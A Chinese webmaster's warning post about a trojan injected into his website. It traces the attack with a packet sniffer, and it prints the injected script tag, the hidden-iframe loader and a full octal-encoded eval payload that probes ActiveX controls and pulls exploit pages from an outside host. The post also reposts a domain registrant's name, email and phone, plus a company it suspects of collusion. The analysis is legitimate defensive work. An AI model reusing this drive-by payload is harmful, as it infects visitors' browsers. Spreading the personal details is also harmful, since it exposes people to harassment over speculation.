主頁 > 知識庫 > 站長小心:大家注意這一個掛馬的

站長小心:大家注意這一個掛馬的

熱門標簽:山東ai外呼電銷機器人好用嗎 申請城陽400電話 浙江房產(chǎn)智能外呼系統(tǒng) 打金融的電銷機器人 騰訊地圖標注公司名稱和地址 外呼crm客戶管理系統(tǒng) 自定義全國地圖標注顏色 辦理400電話 聯(lián)通 佛山市地圖標注

有一個站被掛馬很長時間了,前臺頁面的馬被清掉,但后臺的馬一直找不到,實在不舒服,準備將這個站自殺掉,但又不甘心,決定再找一次。
花了四個多小時,終于找到了,現(xiàn)貼出來提醒大家注意,大家一定不要點馬所在的網(wǎng)址,除非你安裝了殺毒軟件,光一個360是不行的。
先看這一段代碼:
html xmlns="http://www.w3.org/1999/xhtml">
script language='JavaScript' type='text/JavaScript' src='http://www.w3og.cn/org'>/script>
head>
注意其中的'http://www.w3og.cn/org',這是木馬網(wǎng)頁地址。很有欺騙性,我找過很多次都沒注意到。服務器好象是四川樂山電信的,我?guī)缀跻梦易约旱姆掌髋c之同歸于盡。
再強調一下,貼出來不是要害你啊,不要亂點。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陳強
Registrant Name: 陳強
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新網(wǎng)數(shù)碼信息技術有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16



http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
電子郵件: zhuya22@126.com
聯(lián)系電話: 0577658796549
聯(lián)系地址: 電風扇士大夫
提交時間: 2006-12-11
主題: 這樣的設施也能辦大學???
建議內(nèi)容: 溫職院INTERNET網(wǎng)硬件設施太差 每棟宿舍樓網(wǎng)速一直以來比撥號
上網(wǎng)還慢 ,根本不能滿足大學生對TNTER網(wǎng)的需求
交了30元/月的網(wǎng)費卻只能上垃圾網(wǎng)絡,收了我們的血汗錢卻不干人事,氣人兮
氣人,
學校機房既小又差,還1。5元/小時,我靠 這也叫大學嗎??我們學剩
上網(wǎng)只能跑正上的網(wǎng)吧,遠又網(wǎng)費又貴,很多同學為了省錢只能玩通宵
溫職院的網(wǎng)絡設施根本不行,不知道評估團怎么辦事的
可笑的是學校還想評全國十大優(yōu)秀高職 丟死人了


請注意這個公司長沙智之星軟件有限公司www.zzstar.cn,這個木馬一直為這個站帶流量,如果是被陷害的,那還情有可原。如果是同掛馬者合作的話,嚴重鄙視??偨?jīng)理:廖某某(不貼名字了)
公 司 地 址: 長沙市麓山南路343號(礦山研究院內(nèi))902室
聯(lián) 系 電 話: 0731-2173510 (0)13787116266
郵 政 編 碼: 410012
電 子 郵 箱: zzstar888@126.com zzstar168@163.com
公 司 網(wǎng) 址:www.zzstar.cn www.macrorise.com
業(yè)務聯(lián)系QQ:7428377 165635301


另一個受害者的文章:今天學生處的人說他們網(wǎng)頁打開就提示有病毒。上去看了一下,果然,打開之后ie有打開其他網(wǎng)頁的動作,瀏覽器很卡,然后跳出一個RealPlayer的窗口,Nod32提示
2008-4-18 16:21:09 HTTP 過濾器 文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木馬 連接中斷 - 已隔離 NIC\Administrator 通過應用程序訪問 web 時檢測到威脅: C:\Program Files\Maxthon2\Maxthon.exe.

于是開始檢查。
費了一番功夫,就不多說了,直接進入主題。

打開Ethereal,對tcp 80端口進行監(jiān)測,打開Firefox,并清除緩存(如果不清除可能造成不能完全打開)。

完全打開頁面后,關閉監(jiān)測。進行查看。

按照理論來說,應該只有本機與服務器之間的通信,哪么其他IP地址的通信就很可以了。

果然,看到了61.174.63.178這個IP(www.w3og.cn/org),使用Ethereal可以看到具體的URL。

使用FF打開這個網(wǎng)頁。
頁面是空白的,查看源代碼內(nèi)容如下:

www.w3og.cn/org/

document.write("div style='display:none'>")
document.write("iframe src=http://abc1.315666.net/s22.html>/iframe>")
document.write("iframe src=http://www.zzstar.cn/reg/w3o.htm>/iframe>")
document.write("/div>")

順藤摸瓜:
其中
www.zzstar.cb/reg/w30.htm
script language="javascript" src="http://count48.#/click.aspx?id=485576456logo=1">/script>

是51yes的一個統(tǒng)計。

http://abc1.315666.net/s22.html
iframe src="news.html" width=100 height=0>/iframe>
script language="javascript" type="text/javascript" src="http://js.users.#/1793783.js">/script>


第二個頁面也是統(tǒng)計,第一個頁面就是病毒了。
再次使用FF打開,查看源代碼:

script>window.onerror=function(){return true;}/script>
script>
window.defaultStatus="完成";
eval("\164\162\171\173\166\141\162\40\145\73\15\12\166\141\162\40\141\144\157\75\50\144\157\143\165\155\145\156\164\56\143\162\145\141\164\145\105\154\145\155\145\156\164\50\42\157\142\152\145\143\164\42\51\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\141\144\157\56\163\145\164\101\164\164\162\151\142\165\164\145\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\153\141\166\75\42\134\170\64\142\134\170\66\71\134\170\66\145\134\170\66\67\134\170\67\63\134\170\66\146\134\170\66\66\134\170\67\64\42\73\15\12\166\141\162\40\141\163\75\141\144\157\56\143\162\145\141\164\145\157\142\152\145\143\164\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\175\15\12\143\141\164\143\150\50\145\51\173\175\73\15\12\146\151\156\141\154\154\171\173\15\12\151\146\50\145\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\163\143\162\151\160\164\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\155\163\60\66\60\61\64\56\152\163\76\74\134\57\163\143\162\151\160\164\76\42\51\175\15\12\145\154\163\145\173\15\12\164\162\171\173\40\166\141\162\40\146\73\15\12\166\141\162\40\164\150\165\156\144\145\162\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\104\120\103\154\151\145\156\164\56\126\157\144\42\51\73\175\15\12\143\141\164\143\150\50\146\51\173\175\73\15\12\146\151\156\141\154\154\171\173\40\151\146\50\146\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\167\151\144\164\150\75\61\60\60\40\150\145\151\147\150\164\75\60\40\163\162\143\75\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\124\150\165\156\144\145\162\56\150\164\155\154\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\147\73\15\12\166\141\162\40\147\154\167\157\162\154\144\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\107\114\103\110\101\124\56\107\114\103\150\141\164\103\164\162\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\147\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\147\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\107\114\127\117\122\114\104\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\150\73\15\12\166\141\162\40\163\164\157\162\155\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\115\120\123\56\123\164\157\162\155\120\154\141\171\145\162\56\61\42\51\73\175\15\12\143\141\164\143\150\50\150\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\150\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\123\164\157\162\155\111\111\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\151\73\15\12\166\141\162\40\162\145\141\154\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\111\105\122\120\103\164\154\56\111\105\122\120\103\164\154\56\61\42\51\73\175\15\12\143\141\164\143\150\50\151\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\151\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\151\146\162\141\155\145\40\163\164\171\154\145\75\144\151\163\160\154\141\171\72\156\157\156\145\40\163\162\143\75\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\122\145\141\154\56\150\164\155\154\42\76\74\57\151\146\162\141\155\145\76\47\51\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\47\74\163\103\162\111\160\124\40\114\101\156\107\165\101\147\105\75\42\152\101\166\101\163\103\162\111\160\124\42\40\163\162\143\75\150\164\164\160\72\134\57\134\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\134\57\162\145\141\154\56\152\163\76\74\134\57\163\143\162\151\160\164\76\47\51\175\175\15\12\164\162\171\173\166\141\162\40\152\73\15\12\166\141\162\40\102\141\151\144\165\75\156\145\167\40\101\143\164\151\166\145\130\117\142\152\145\143\164\50\42\102\141\151\144\165\102\141\162\56\124\157\157\154\42\51\73\175\15\12\143\141\164\143\150\50\152\51\173\175\73\15\12\146\151\156\141\154\154\171\173\151\146\50\152\41\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\173\15\12\102\141\151\144\165\133\42\134\170\64\64\134\170\66\143\134\170\66\146\134\170\66\61\134\170\66\64\134\170\64\64\134\170\65\63\42\135\50\42\150\164\164\160\72\57\57\165\163\145\162\61\56\63\63\62\61\66\56\156\145\164\57\102\141\151\144\165\56\143\141\142\42\54\40\42\134\170\64\62\134\170\66\61\134\170\66\71\134\170\66\64\134\170\67\65\134\170\62\145\134\170\66\65\134\170\67\70\134\170\66\65\42\54\40\60\51\175\175\15\12\151\146\50\146\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\147\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\150\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\151\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\40\46\46\40\152\75\75\42\133\157\142\152\145\143\164\40\105\162\162\157\162\135\42\51\15\12\173\154\157\143\141\164\151\157\156\56\162\145\160\154\141\143\145\50\42\141\142\157\165\164\72\142\154\141\156\153\42\51\73\175\175\175")
/*Extreme*/
/script>

很顯然,這個就是病毒源代碼了。加密了而且,不管他了。
另外注意到,
http://www.#/report/0_help.asp?id=1793783err=4help=2
可以看到統(tǒng)計名稱。不就是為了一點流量,做這些犯罪的事情,何必呢?



1、使用FF Ethereal。FF不會被這些漏洞利用,而IE基本是一打開就死了。
2、上傳的漏洞位于\xgc\AD\200804\1.js,應該是用的動易的漏洞上傳的。
3、搜索w3og.cn,基本搜索到的網(wǎng)頁,google都會提示是惡意網(wǎng)站...

擁有這個W3og.cn的人的注冊信息:
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陳強 Registrant Name: 陳強 Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新網(wǎng)數(shù)碼信息技術有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16

這個w3og.cn和zzstar(一家建站公司)顯然是有關系的,要不然也不會再木馬里面掛上zzstar的流量統(tǒng)計...

標簽:婁底 攀枝花 北京 長白山 棗莊 石嘴山 孝感 襄陽

巨人網(wǎng)絡通訊聲明:本文標題《站長小心:大家注意這一個掛馬的》,本文關鍵詞  站長,小心,大家,注意,這,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《站長小心:大家注意這一個掛馬的》相關的同類信息!
  • 本頁收集關于站長小心:大家注意這一個掛馬的的相關信息資訊供網(wǎng)民參考!
  • 推薦文章